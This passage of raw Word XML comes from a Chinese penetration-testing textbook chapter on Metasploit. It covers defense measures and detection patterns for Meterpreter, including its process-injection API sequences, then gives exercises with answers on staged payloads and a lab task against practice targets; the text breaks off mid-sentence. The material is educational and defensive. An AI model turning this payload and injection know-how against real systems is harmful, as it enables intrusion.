      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击与防御总是成对出现。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块化攻击链，防御者的核心策略是纵深防御，在各个层面检测和阻断攻击的展开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块的防御：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">根本修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：任何利用的第一步都是触发漏洞。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">及时的系统与软件补丁管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是消除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块存在前提的最有效手段。无论是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsFTPd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">还是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RMI，其已知漏洞都有官方补丁。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟补丁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于无法及时打补丁的系统，应部署可进行流量检测的网络入侵防御系统（NIPS），对已知漏洞的攻击特征码（如特定服务端口上的畸形请求）进行检测和阻断。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小化攻击面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过主机防火墙严格限制。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java RMI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务仅需对内通信，就应使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iptables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或主机防火墙策略禁止来自互联网或其他受信任区域之外的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1099 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话的防御：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络流量特征检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密通信虽然加密，但其初始的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手协商阶段仍然存在可检测特征。现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NIDS（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata）可以部署专门检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书指纹的规则。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常进程与内存行为监控（核心）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的关键。其“免文件”和“进程注入”特性，本身就是可检测的异常行为。端点检测与响应（EDR）系统可以通过监控以下行为进行发现：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">进程/进程间操作监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为，即一个进程对另一个进程调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenProcess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualAllocEx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateRemoteThread</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等高敏感</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列。这几乎是所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">植入的核心特征。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常网络连接与进程关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：识别由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">svchost.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等通常不发起网络连接的进程，突然建立到外部不常见端口的长期</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内存取证分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在高度安全的环境下，对可疑主机进行内存转储（Memory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump），并使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Volatility </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等分析工具，扫描内存中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特征（如特定的库函数、TLV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议解析器、加密会话证书签名）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">一个无法修补漏洞、无法阻断网络且无法监控内存的防御体系，在面对模块化渗透框架时是彻底失效的。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="306"/>
    <w:bookmarkStart w:id="307" w:name="习题-17.1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：简述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Staged Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stageless Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心区别，并解释为何典型的栈溢出漏洞利用中更倾向于使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Staged Payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从代码体积和漏洞环境的限制出发思考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由一个极小的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和一个作为后加载的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组成，Stageless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则是完全自包含的。栈溢出等漏洞为注入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的可用缓冲区空间通常非常有限。Stager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">体积远小于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stageless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload，因此能被成功部署在这种受限环境中。Stager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署后再从网络加载功能完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage，绕过了初始空间限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：列举并简述至少三种蓝队可用来检测目标主机上存在活跃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从网络、主机行为和内存三个层面思考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络异常连接分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控非浏览器进程发起的异常向外的加密连接；2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机行为监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控高风险的进程间内存操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用链（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualAllocEx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateRemoteThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），这能暴露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的进程注入（migrate）行为；3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内存取证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Volatility </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具扫描物理内存转储，寻找</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关插件的函数签名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议解析器特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之外，部署另一个可用的漏洞靶机环境（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、OWASP Broken Web Apps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场中的任意简单靶机），尝试以此章所学的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
